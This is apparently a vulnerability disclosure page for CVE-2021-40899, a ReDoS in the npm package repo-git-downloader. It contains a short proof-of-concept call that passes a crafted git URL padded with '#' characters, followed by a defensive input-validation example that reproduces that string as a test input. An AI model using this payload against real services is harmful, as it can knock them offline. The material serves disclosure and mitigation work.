Headline
CVE-2021-40899: SaveResults/repo-git-downloader.js at main · yetingli/SaveResults
A Regular Expression Denial of Service (ReDoS) vulnerability was discovered in repo-git-downloader v0.1.1 when downloading crafted invalid git repositories.
/**
* repo-git-downloader@0.1.1
* Package Manager: npm
* Link to published package: https://github.com/mnichangxin/repo-git-downloader
* Link to GitHub repo: https://github.com/mnichangxin/repo-git-downloader
* Severity level: High
* Module Description: A tool to download git repository
* Additional Info: It can cause a denial of service when downloading crafted invalid git repositories.
* Contacted maintainer?: No
* Open issue?: No
*/
var download = require(“repo-git-downloader”)
download(‘git@github.com:–/--#################################################################################################################################################################!’)
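A caller-side mitigation for the issue reported above, as an added example that is not code from repo-git-downloader or from the report: cap the length of the repository string and check it with single-pass, non-nested patterns before it reaches the library. The function name `parseRepoSpec`, the accepted formats and the length limits are assumptions.

```javascript
// Added example (not from repo-git-downloader): validate a repository string
// with a length cap and linear-time checks before any regex-based parser sees it.
// Assumed accepted forms: "git@host:owner/repo[.git][#ref]" and "owner/repo[#ref]".
const MAX_SPEC_LENGTH = 200; // assumption: generous for real repository specs

// One bounded character class each, no nested quantifiers: matching is linear.
const SEGMENT = /^[A-Za-z0-9][A-Za-z0-9._-]{0,99}$/;
const REF = /^[A-Za-z0-9][A-Za-z0-9._\/-]{0,99}$/;

function parseRepoSpec(input) {
  if (typeof input !== 'string' || input.length === 0 || input.length > MAX_SPEC_LENGTH) {
    return null; // reject oversized or non-string input before any matching
  }
  let rest = input;
  let ref = null;
  const hash = rest.indexOf('#');
  if (hash !== -1) {
    ref = rest.slice(hash + 1);
    rest = rest.slice(0, hash);
    if (!REF.test(ref)) return null; // a ref may not contain further '#' characters
  }
  let host = null;
  if (rest.startsWith('git@')) {
    const colon = rest.indexOf(':');
    if (colon === -1) return null;
    host = rest.slice(4, colon);
    rest = rest.slice(colon + 1);
    if (!SEGMENT.test(host)) return null;
  }
  const parts = rest.split('/');
  if (parts.length !== 2) return null; // exactly owner/repo
  const owner = parts[0];
  const repo = parts[1].endsWith('.git') ? parts[1].slice(0, -4) : parts[1];
  if (!SEGMENT.test(owner) || !SEGMENT.test(repo)) return null;
  return { host, owner, repo, ref };
}

// Constructed sample inputs; the last has the shape of the string in the report.
const samples = [
  'git@github.com:mnichangxin/repo-git-downloader.git',
  'mnichangxin/repo-git-downloader#main',
  'git@github.com:--/--' + '#'.repeat(160) + '!',
];
for (const s of samples) {
  console.log(parseRepoSpec(s) ? 'accept' : 'reject', s.slice(0, 60));
}
```

Only strings for which `parseRepoSpec` returns an object should be passed on to `download`.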